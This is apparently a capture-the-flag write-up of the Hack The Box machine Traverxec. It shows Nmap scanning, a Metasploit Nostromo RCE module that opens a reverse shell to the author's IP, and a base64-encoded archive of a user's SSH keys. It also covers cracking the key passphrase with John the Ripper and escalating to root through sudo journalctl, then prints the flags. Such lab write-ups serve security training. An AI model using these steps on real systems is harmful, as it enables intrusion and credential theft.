On November 16 last year, Hack The Box launched the Linux Machine Traverxec. A box with a difficulty level of “Easy”, something that indeed matches after rooting.

[0x1] Reconnaissance & Enumeration
Starting the new box starts of course again with an Nmap scan of all ports based on script and service detection.
nmap -sC -sV -p- -oA traverxec 10.10.10.165 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 20:03 GMT Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 35.05% done; ETC: 20:10 (0:04:36 remaining) Stats: 0:04:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 62.21% done; ETC: 20:11 (0:02:57 remaining) Nmap scan report for 10.10.10.165 Host is up (0.020s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA) | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA) |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519) 80/tcp open http nostromo 1.9.6 |_http-server-header: nostromo 1.9.6 |_http-title: TRAVERXEC Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 393.13 seconds
The scan shows that port 80 is open and here a Nostromo 1.9.6. service is active. A quick check with searchsploit indicates that a known Directory Traversal RCE is known and available in Metasploit.
searchsploit nostromo ----------- ---------------------------------------- Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb
[0x2] Initial foothold
Let’s fire up the good old msfconsole.
msfconsole _____________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V5 | |______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \ / \ / \ ########### / \ / \ / \ #### ################################################################################ ################################################################################ # WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ https://metasploit.com =[ metasploit v5.0.72-dev ] + -- --=[ 1962 exploits - 1095 auxiliary - 336 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ]
Before I got the Nostromo exploit available I had to update Metasploit. This can be done easily with apt install metasploit framework . If you already have Metasploit, the package will be updated immediately.
msf5 exploit(multi/http/nostromo_code_exec) > search nostromo Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
You really only need two options to activate the exploit. RHOSTS with the IP address of the Traverxec box and LHOST with your own tunnel IP address.
msf5 > use exploit/multi/http/nostromo_code_exec msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.10.165 RHOSTS => 10.10.10.165 msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.15.47 LHOST => 10.10.15.47
The exploit takes a few seconds to run and after this you will get a limited shell like www-html.
msf5 exploit(multi/http/nostromo_code_exec) > exploit [*] Started reverse TCP handler on 10.10.15.47:4444 [*] Configuring Automatic (Unix In-Memory) target [*] Sending cmd/unix/reverse_perl command payload [*] Command shell session 1 opened (10.10.15.47:4444 -> 10.10.10.165:55468) at 2020-02-08 09:35:06 +0000 whoami www-data
By means of the command shell you can upgrade the current shell to an interactive shell.
shell [*] Trying to find binary(python) on target machine [*] Found python at /usr/bin/python [*] Using `python` to pop up an interactive shell
[0x3] Path to User flag
After some poking around the machine and Nostromo’s documentation, I found the config file where the options are stored. Ultimately, public_www turns out to be the place where interesting information can be found. However, you must go to the full path, not folder by folder due to a limitation in your permissions.
cat /var/nostromo/conf/nhttpd.conf # MAIN [MANDATORY] servername traverxec.htb serverlisten * serveradmin david@traverxec.htb serverroot /var/nostromo servermimes conf/mimes docroot /var/nostromo/htdocs docindex index.html # LOGS [OPTIONAL] logpid logs/nhttpd.pid # SETUID [RECOMMENDED] user www-data # BASIC AUTHENTICATION [OPTIONAL] htaccess .htaccess htpasswd /var/nostromo/conf/.htpasswd # ALIASES [OPTIONAL] /icons /var/nostromo/icons # HOMEDIRS [OPTIONAL] homedirs /home homedirs_public public_www
While watching a YouTube video about Hack The Box, I came across the following way to easily copy / paste a file to your own machine from a remote session. By means of base64 encode the file itself and you can copy the text. In this case I do that with the gunzipped tarball.
base64 backup-ssh-identity-files.tgz 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
I paste the base64 data in the file backup_base64.txt and then I decode the contents as a new file backup.tgz .
base64 -d backup_base64.txt |sudo tee backup.tgz
Extracting the original files in the archive can now be done in the usual way and after this the private and public key of David will appear.
tar -zxf backup.tgz ls authorized_keys id_rsa id_rsa.pub
I prepare the captured Private Key to crack with John The Ripper. For this I use ssh2john, a Python script which is standard present in / usr / share / john.
python /usr/share/john/ssh2john.py id_rsa > id_rsa_ready4john.txt
With the Private Key suitable for John I start the dictionary attack based on the Rockyou wordlist.
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_ready4john.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status hunter (id_rsa) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:05 DONE (2020-02-08 10:57) 0.1779g/s 2551Kp/s 2551Kc/s 2551KC/sa6_123..*7¡Vamos! Session completed
John doesn’t have much trouble finding the password and within seconds the attack on the Private Key was successfully completed: hunter it is!
john id_rsa_ready4john.txt --show id_rsa:hunter
Based on the Private Key, I connect via SSH, which came out of the Nmap scan as an option, and enter the password. After this, a prompt like David appears neatly .
ssh -i id_rsa david@10.10.10.165 Enter passphrase for key 'id_rsa': Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 Last login: Sat Feb 8 05:59:17 2020 from 10.10.15.230 david@traverxec:~$
A quick check in the current directory will indicate the presence of the user.txt .
ls bin public_www user.txt
So much for the user flag. But now time for the other half of the challenge. On to root!
cat user.txt 7db0b48469606a42cec20750d9782f3d
[0x4] Path to Root flag
Once in David’s home folder it is time to look around for new clues. The bin folder contains an interesting script that gets some log data and displays it on the screen.
cat server-stats.sh #!/bin/bash cat /home/david/bin/server-stats.head echo "Load: `/usr/bin/uptime`" echo " " echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`" echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`" echo " " echo "Last 5 journal log lines:" /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
journalctl is a so-called GTFObin, a Linux binary known to be exploited for privledge escalation. One of my first actions when seeing scripts running a command under sudo is to consult GTFObins.com .

When starting journalctl , the latest log entries from the journal daemon are displayed. However, it is possible to break out of this as shown in the above screenshot of GTFObins.
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service -- Logs begin at Sat 2020-02-08 06:14 Feb 08 06:28:03 traverxec su[1297]: F Feb 08 06:29:06 traverxec sudo[1370]: Feb 08 06:29:20 traverxec sudo[1381]: Feb 08 06:56:33 traverxec su[2396]: p Feb 08 06:56:35 traverxec su[2396]: F
The command is active and gives output, now it is possible to escalate and get a shell as root using! / Bin / sh.
!/bin/sh # whoami root
Once a root user, I look for the root.txt in the well-known place to see if the key is there, or if a new challenge presents itself.
cd /root # ls nostromo_1.9.6-1.deb root.txt
Root-flag it is! Nice box and relatively easy to do for beginners. Learned another nice privilege escalation and on to the next machine!
# cat root.txt 9aa36a6d76f785dfd320a478f6e0d906